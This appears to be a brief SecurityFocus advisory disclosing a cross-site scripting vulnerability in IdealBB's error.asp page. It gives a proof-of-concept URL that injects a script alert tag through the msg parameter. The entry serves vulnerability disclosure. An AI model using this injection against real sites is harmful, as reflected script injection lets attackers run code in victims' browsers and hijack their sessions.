IdealBB Error.ASP Cross-Site Scripting Vulnerability

The following proof of concept has been supplied:

http://www.example.com/idealbb/error.asp?e=16&sessionID={xxxxxxxx-xxxx-xxxx-
xxxx-xxxxxxxxxxxx}&msg=<script>alert('Zone-h')</script>


 

Privacy Statement
Copyright 2010, SecurityFocus